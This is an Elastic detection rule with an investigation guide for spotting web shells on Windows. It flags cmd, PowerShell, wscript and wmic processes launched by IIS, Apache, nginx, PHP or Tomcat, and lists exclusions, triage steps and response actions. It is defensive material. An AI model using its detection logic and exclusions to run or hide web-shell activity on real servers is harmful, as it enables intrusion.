Web Shell Detection: Script Process Child of Common Web Processes

  1[metadata]
  2creation_date = "2021/08/24"
  3integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"]
  4maturity = "production"
  5updated_date = "2026/05/03"
  6
  7[rule]
  8author = ["Elastic"]
  9description = "Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access."
 10false_positives = [
 11    """
 12    Security audits, maintenance, and network administrative scripts may trigger this alert only when parent context,
 13    child identity, command scope, service identity, and available artifact or destination evidence align to the same
 14    bounded workflow.
 15    """,
 16]
 17from = "now-9m"
 18index = [
 19    "endgame-*",
 20    "logs-crowdstrike.fdr*",
 21    "logs-endpoint.events.process-*",
 22    "logs-m365_defender.event-*",
 23    "logs-sentinel_one_cloud_funnel.*",
 24    "logs-system.security*",
 25    "logs-windows.sysmon_operational-*",
 26    "winlogbeat-*",
 27]
 28language = "kuery"
 29license = "Elastic License v2"
 30name = "Web Shell Detection: Script Process Child of Common Web Processes"
 31references = [
 32    "https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/",
 33    "https://www.elastic.co/security-labs/elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965",
 34    "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1",
 35]
 36risk_score = 73
 37rule_id = "2917d495-59bd-4250-b395-c29409b76086"
 38severity = "high"
 39tags = [
 40    "Domain: Endpoint",
 41    "OS: Windows",
 42    "Use Case: Threat Detection",
 43    "Tactic: Persistence",
 44    "Resources: Investigation Guide",
 45    "Data Source: Elastic Endgame",
 46    "Data Source: Elastic Defend",
 47    "Data Source: SentinelOne",
 48    "Data Source: Windows Security Event Logs",
 49    "Data Source: Microsoft Defender XDR",
 50    "Data Source: Sysmon",
 51    "Data Source: Crowdstrike",
 52]
 53timestamp_override = "event.ingested"
 54type = "new_terms"
 55
 56query = '''
 57host.os.type:windows and event.category:process and event.type:start and process.args : * and
 58  process.parent.name:("w3wp.exe" or "httpd.exe" or "nginx.exe" or "php.exe" or "php-cgi.exe" or "tomcat.exe" or "ArcSOC.exe") and
 59  (
 60    process.name : ("cmd.exe" or "cscript.exe" or "powershell.exe" or "pwsh.exe" or "powershell_ise.exe" or "wmic.exe" or "wscript.exe") or
 61    process.name.caseless : ("cmd.exe" or "cscript.exe" or "powershell.exe" or "pwsh.exe" or "powershell_ise.exe" or "wmic.exe" or "wscript.exe")
 62  ) and
 63  not
 64  (
 65    process.command_line : (
 66      "cmd.exe /c mode CON" or
 67      "cmd.exe /s /c \"mode CON\"" or
 68      "cmd.exe /c \"mode\"" or
 69      "cmd.exe /s /c \"tput colors 2>&1\"" or
 70      "cmd.exe /s /c \"stty 2> NUL\"" or
 71      "cmd.exe /s /c \"stty 2>&1\"" or
 72      "cmd.exe /c \"stty 2>&1\"" or
 73      "cmd.exe /s /c \"ipconfig /all 2>&1\"" or
 74      "cmd.exe /s /c \"echo '%os%'\"" or
 75      *.\\install\\awk.exe*
 76    ) or
 77    process.args : (\(git or (*artisan* and *queue\:work*) or *rmdir* or "mode CON" or ver or ls or mode or dir) or
 78
 79    (process.name:cmd.exe and process.parent.args : "c:\\\\xampp\\\\htdocs\\\\open-audit\\\\index.php") or
 80
 81    (process.name:cmd.exe and process.args:("/V:ON" and "--header-html")) or
 82
 83    (process.parent.args:"WebCession" and process.args:E\:\\Data\\CLM\\cession\\*.bat) or
 84
 85    (process.parent.executable :"D:\\AiDKlinik\\php\\php-cgi.exe" and process.args:D\:\\AiDKlinik\\web*) or
 86
 87    (process.parent.args :"E:/wamp64/bin/apache/apache2.4.62.1" and process.args:node*) or
 88
 89    (process.parent.name:"php.exe" and process.name:"cmd.exe" and process.args:("/V:ON" and "/E:ON"))
 90  )
 91'''
 92
 93note = """## Triage and analysis
 94
 95#### Possible investigation steps
 96
 97- What execution path did the alert capture?
 98  - Focus: child `process.executable` / `process.command_line`; web-parent `process.parent.name`, `process.parent.executable`, and `process.parent.command_line` for IIS/Apache/nginx/PHP CGI/Tomcat/ArcGIS.
 99  - Implication: escalate when a web-facing parent launches a shell, script host, downloader, archive tool, or admin utility outside bounded tasks; lower only when parent context, child path, and command match one exact deployment, health-check, log rotation, or support task.
100- Is the child command administration or post-exploitation?
101  - Focus: `process.command_line`: WMIC, download cradles, archive creation, account/system discovery, service control, credential access, script-host flags, or web-root/temp/backup/app-content paths.
102  - Hint: for PowerShell, reconstruct script blocks by `host.id` and `process.pid` via `powershell.file.script_block_text`, `powershell.sequence`, and `powershell.total`; missing PowerShell telemetry is unresolved, not benign.
103  - Implication: escalate when the command stages payloads, runs discovery, creates accounts, changes services, or writes to web-accessible or temp paths; lower suspicion when bounded to one recognized deployment, health-check, log rotation, or support task.
104- Is user context human admin or service identity?
105  - Why: web-process children often inherit app-pool or service identity; `user.id`, `user.name`, and `user.domain` do not prove human initiation.
106  - Focus: `@timestamp`, `user.id`, `user.name`, `process.Ext.session_info.logon_type`, and `process.parent.command_line`.
107  - Implication: escalate when service or network logon context launches interactive troubleshooting, remote administration, or off-hours shell activity without a matching window; lower suspicion when identity, logon type, parent pool/service, and command scope fit one exact workflow.
108- Does child binary identity fit its command?
109  - Focus: `process.executable`, `process.pe.original_file_name`, `process.hash.sha256`, `process.code_signature.subject_name`, and `process.code_signature.trusted`.
110  - Implication: escalate when the child is renamed, unsigned/untrusted, user-writable, or mismatched to original file name; lower suspicion when identity and path match stable tooling, but continue because trusted binaries can carry web-shell commands.
111- Did file telemetry show web-shell placement, staging, or config changes?
112  - Focus: if file telemetry exists, review `host.id` file events for child `process.entity_id` or `process.pid`, checking `file.path`, `file.Ext.original.path`, and `file.Ext.windows.zone_identifier`. $investigate_1
113  - Hint: web-root script writes without later child starts are adjacent-variant evidence; if the child writes a script or executable, query starts where `process.executable` equals that path on same `host.id`.
114  - Implication: escalate when the child writes ASPX, ASP, PHP, JSP, JS, BAT, PS1, EXE, DLL, JAR, WAR, or archives to web-accessible/temp/user-writable paths, or a written artifact later executes; missing file telemetry is unresolved, not benign, and absence does not close.
115- Did the child launch second-stage processes?
116  - Focus: child starts on `host.id` where `process.parent.entity_id` equals child `process.entity_id`, checking `process.executable`, `process.command_line`, and `process.hash.sha256`. $investigate_2
117  - Implication: escalate when descendants include shells, script hosts, downloaders, archive tools, credential utilities, service control, or persistence tooling; absence only narrows impact when command, file, network, and related alerts also fit a benign workflow.
118- Did DNS/network telemetry show retrieval or control?
119  - Focus: if DNS/network telemetry exists, review child `process.entity_id` events on `host.id`, separating `dns.question.name` / `dns.resolved_ip` from `destination.ip` / `destination.port`; compare role with command intent. $investigate_3
120  - Hint: map DNS results to later connection IPs before linking query and connection; if a third-party alert lacks `process.entity_id`, recover the child by `host.id`, `process.pid`, and `@timestamp`. Missing network/DNS telemetry is unresolved, not benign.
121  - Implication: escalate when the child retrieves tools from public infrastructure, reaches rare/misaligned destinations, or connects outside web-server administration; decide from alert-local process evidence and corroboration when DNS/network telemetry is unavailable.
122- Do related alerts show broader compromise?
123  - Focus: same-web-parent starts and 48h `host.id` alerts for web-shell, credential-access, discovery, archive, lateral-movement, persistence, or anti-forensics.
124    - $investigate_4
125    - $investigate_0
126  - Implication: escalate scope when alerts cluster around the same server role, child command family, or staged artifacts; absence only narrows response scope when local parent-child, command, identity, file, and network evidence are explained.
127- What disposition fits?
128  - Implication: escalate on unexplained server-side execution, exploit-like command intent, suspicious child identity, payload staging, rare destinations, or broader compromise; do not wait for optional pivots when alert-local process evidence is unsafe. Close only when same-host alert-window telemetry proves one exact benign web-server workflow; use outside confirmation for legitimacy gaps. If evidence is mixed or visibility incomplete, preserve artifacts and escalate.
129
130### False positive analysis
131
132- Web deployment, post-install validation, health checks, vendor extension install, ArcGIS publishing, or maintenance can spawn "cmd.exe", PowerShell, or "wscript.exe" from web components. Confirm only when parent, child, command, service identity, and artifact/destination evidence describe the same alert-window workflow with no unexpected web-content writes, rare callbacks, or contradictions.
133- If telemetry proves shape but not legitimacy, require matching change, deployment, runbook, vendor, or owner confirmation; use prior occurrences post-closure to test exception stability.
134- Build exceptions from minimum confirmed pattern: web parent command, child executable/hash/signature, command line, `user.id`, `host.id`, and bounded content path or destination when decisive. Avoid parent name, `process.name`, or `host.id` alone.
135
136### Response and remediation
137
138- If confirmed benign, reverse temporary containment, document exact parent, child, command, service identity, artifact/destination evidence, and confirmation, and create exceptions only from that pattern.
139- If suspicious but unconfirmed, preserve the alert/export, process tree, child/parent entity IDs, command lines, hash, staged-file copies, destinations, related alerts, and web/app logs around `@timestamp` before containment or cleanup.
140- Apply reversible containment tied to evidence: block confirmed malicious destinations, restrict affected site/app access, disable exposed extension or virtual directory, or increase `host.id` monitoring. Isolate only when evidence and server criticality permit.
141- If confirmed malicious, contain the host or terminate the child only after preservation; if direct response is unavailable, escalate with process/artifact/destination/server-log evidence to the team that can contain the server, disable the exposed path, or stop the service.
142- Before deletion/restoration, hunt for the same hash, child command, staged path, domain, IP, and port across hosts/accounts. Then remove web shells, scripts, archives, scheduled tasks, dropped utilities, and persistence; restore known-good content/config; rotate exposed service, app, or admin credentials if secrets may be exposed.
143- After containment, patch the implicated app, extension, framework, or server component; review the internet-exposed site/service that launched the child; retain endpoint, network, and web logs; document script-only variants or logging gaps.
144"""
145
146setup = """## Setup
147
148This rule is designed for data generated by [Elastic Defend](https://www.elastic.co/security/endpoint-security), which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules.
149
150Setup instructions: https://ela.st/install-elastic-defend
151
152### Additional data sources
153
154This rule also supports the following third-party data sources. For setup instructions, refer to the links below:
155
156- [CrowdStrike](https://ela.st/crowdstrike-integration)
157- [Microsoft Defender XDR](https://ela.st/m365-defender)
158- [SentinelOne Cloud Funnel](https://ela.st/sentinel-one-cloud-funnel)
159- [Sysmon Event ID 1 - Process Creation](https://ela.st/sysmon-event-1-setup)
160- [Windows Process Creation Logs](https://ela.st/audit-process-creation)
161"""
162
163[[rule.filters]]
164[rule.filters.meta]
165negate = true
166[rule.filters.query.wildcard."process.command_line"]
167case_insensitive = true
168value = "*?:\\\\Program Files\\\\*"
169
170[[rule.filters]]
171[rule.filters.meta]
172negate = true
173[rule.filters.query.wildcard."process.command_line"]
174case_insensitive = true
175value = "*?:\\\\Program Files (x86)\\\\*"
176
177[rule.investigation_fields]
178field_names = [
179    "@timestamp",
180    "host.name",
181    "host.id",
182    "user.id",
183    "process.entity_id",
184    "process.pid",
185    "process.executable",
186    "process.command_line",
187    "process.Ext.session_info.logon_type",
188    "process.pe.original_file_name",
189    "process.code_signature.subject_name",
190    "process.code_signature.trusted",
191    "process.hash.sha256",
192    "process.parent.executable",
193    "process.parent.command_line",
194]
195
196[transform]
197
198[[transform.investigate]]
199label = "Alerts associated with the host"
200description = ""
201providers = [
202  [
203    { excluded = false, field = "event.kind", queryType = "phrase", value = "signal", valueType = "string" },
204    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" }
205  ]
206]
207relativeFrom = "now-48h/h"
208relativeTo = "now"
209
210[[transform.investigate]]
211label = "File events for the suspicious child process"
212description = ""
213providers = [
214  [
215    { excluded = false, field = "event.category", queryType = "phrase", value = "file", valueType = "string" },
216    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
217    { excluded = false, field = "process.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" }
218  ],
219  [
220    { excluded = false, field = "event.category", queryType = "phrase", value = "file", valueType = "string" },
221    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
222    { excluded = false, field = "process.pid", queryType = "phrase", value = "{{process.pid}}", valueType = "string" }
223  ]
224]
225relativeFrom = "now-1h"
226relativeTo = "now"
227
228[[transform.investigate]]
229label = "Child process events from the suspicious child"
230description = ""
231providers = [
232  [
233    { excluded = false, field = "event.category", queryType = "phrase", value = "process", valueType = "string" },
234    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
235    { excluded = false, field = "process.parent.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" }
236  ]
237]
238relativeFrom = "now-1h"
239relativeTo = "now"
240
241[[transform.investigate]]
242label = "Network events for the suspicious child process"
243description = ""
244providers = [
245  [
246    { excluded = false, field = "event.category", queryType = "phrase", value = "network", valueType = "string" },
247    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
248    { excluded = false, field = "process.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" }
249  ],
250  [
251    { excluded = false, field = "event.category", queryType = "phrase", value = "network", valueType = "string" },
252    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
253    { excluded = false, field = "process.pid", queryType = "phrase", value = "{{process.pid}}", valueType = "string" }
254  ]
255]
256relativeFrom = "now-1h"
257relativeTo = "now"
258
259[[transform.investigate]]
260label = "Process events from the same web parent"
261description = ""
262providers = [
263  [
264    { excluded = false, field = "event.category", queryType = "phrase", value = "process", valueType = "string" },
265    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
266    { excluded = false, field = "process.parent.entity_id", queryType = "phrase", value = "{{process.parent.entity_id}}", valueType = "string" }
267  ]
268]
269relativeFrom = "now-1h"
270relativeTo = "now"
271
272[rule.new_terms]
273field = "new_terms_fields"
274value = ["host.id", "process.command_line"]
275[[rule.new_terms.history_window_start]]
276field = "history_window_start"
277value = "now-7d"
278
279[[rule.threat]]
280framework = "MITRE ATT&CK"
281
282[[rule.threat.technique]]
283id = "T1505"
284name = "Server Software Component"
285reference = "https://attack.mitre.org/techniques/T1505/"
286
287[[rule.threat.technique.subtechnique]]
288id = "T1505.003"
289name = "Web Shell"
290reference = "https://attack.mitre.org/techniques/T1505/003/"
291
292[rule.threat.tactic]
293id = "TA0003"
294name = "Persistence"
295reference = "https://attack.mitre.org/tactics/TA0003/"
296
297[[rule.threat]]
298framework = "MITRE ATT&CK"
299
300[[rule.threat.technique]]
301id = "T1190"
302name = "Exploit Public-Facing Application"
303reference = "https://attack.mitre.org/techniques/T1190/"
304
305[rule.threat.tactic]
306id = "TA0001"
307name = "Initial Access"
308reference = "https://attack.mitre.org/tactics/TA0001/"
309
310[[rule.threat]]
311framework = "MITRE ATT&CK"
312
313[[rule.threat.technique]]
314id = "T1047"
315name = "Windows Management Instrumentation"
316reference = "https://attack.mitre.org/techniques/T1047/"
317
318[[rule.threat.technique]]
319id = "T1059"
320name = "Command and Scripting Interpreter"
321reference = "https://attack.mitre.org/techniques/T1059/"
322
323[[rule.threat.technique.subtechnique]]
324id = "T1059.001"
325name = "PowerShell"
326reference = "https://attack.mitre.org/techniques/T1059/001/"
327
328[[rule.threat.technique.subtechnique]]
329id = "T1059.003"
330name = "Windows Command Shell"
331reference = "https://attack.mitre.org/techniques/T1059/003/"
332
333[[rule.threat.technique.subtechnique]]
334id = "T1059.005"
335name = "Visual Basic"
336reference = "https://attack.mitre.org/techniques/T1059/005/"
337
338[[rule.threat.technique.subtechnique]]
339id = "T1059.007"
340name = "JavaScript"
341reference = "https://attack.mitre.org/techniques/T1059/007/"
342
343[rule.threat.tactic]
344id = "TA0002"
345name = "Execution"
346reference = "https://attack.mitre.org/tactics/TA0002/"